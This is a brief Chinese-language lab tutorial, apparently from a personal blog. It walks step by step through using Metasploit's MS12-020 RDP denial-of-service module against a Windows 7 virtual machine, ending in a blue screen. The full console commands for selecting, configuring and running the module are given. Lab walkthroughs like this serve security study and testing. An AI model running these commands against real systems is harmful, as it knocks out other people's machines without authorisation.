漏洞分析:MS12-020漏洞
实验工具
1、VMware虚拟机
2、Kali 2021 系统虚拟机
3、Windows 7系统虚拟机
1、第一步:在VMware中打开Kali 2021虚拟机和Windows 7虚拟机,并确保两台机器能够互相【Ping】通,网络连接正常。
2、确定能连通后,打开MSF攻击框架,Kali 2021【终端】中输入命令【msfconsole】。
3、输入搜索命令,搜索MS12-020漏洞,输入命令【search ms12_020】。
4、引用编号为【1】的漏洞,引用漏洞路径,利用了rdp协议的一种漏洞,输入命令【use auxiliary/dos/windows/rdp/ms12_020_maxchannelids】,回车执行。
5、引用后,输入【show options】查看漏洞配置内容。
6、可以看到,可配置的内容并不是很多,接下来配置【rhosts】即可,因为该漏洞利用rdp协议,使用了3389端口,所以【rport】不需要修改,输入命令,【set rhosts IP地址】,IP地址为Windows 7虚拟机的IP。
7、全部配置完毕,输入【run】运行,回到Windows 7发现虚拟机蓝屏,证明MS12_020漏洞攻击成功。
博客园地址:https://www.cnblogs.com/redHskb/
知乎地址:https://www.zhihu.com/people/yi-kuai-xiao-bing-gan-43-64/posts
欢迎关注评论,耶斯莫拉